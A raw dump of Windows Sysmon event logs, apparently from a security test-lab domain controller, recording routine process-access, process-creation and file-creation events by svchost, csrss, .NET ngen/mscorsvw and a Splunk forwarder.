13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-910E-6005-7501-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-910E-6005-7501-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.001{59A5CD1D-910E-6005-7501-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000005732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:51.594{59A5CD1D-9100-6005-6E01-00000000A301}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\105c-0\PresentationFramework.dll2021-01-18 13:45:51.594 10341000x80000000000000005742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:52.781{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9110-6005-7801-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.766{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9110-6005-7801-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:52.766{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9110-6005-7801-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:52.703{59A5CD1D-9110-6005-7701-00000000A301}4240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1090-0\PresentationFramework.Aero2.dll2021-01-18 13:45:52.703 10341000x80000000000000005738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:52.250{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9110-6005-7701-00000000A301}4240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.250{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9110-6005-7701-00000000A301}4240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:52.250{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9110-6005-7701-00000000A301}4240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.141{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9110-6005-7601-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.125{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9110-6005-7601-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.125{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9110-6005-7601-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:53.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9111-6005-7901-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:53.172{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9111-6005-7901-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:53.172{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9111-6005-7901-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:55.922{59A5CD1D-9111-6005-7901-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10f8-0\Microsoft.ActiveDirectory.Management.dll2021-01-18 13:45:55.922 10341000x80000000000000005752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:56.109{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9114-6005-7B01-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:56.094{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9114-6005-7B01-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:56.094{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9114-6005-7B01-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:56.047{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9114-6005-7A01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTE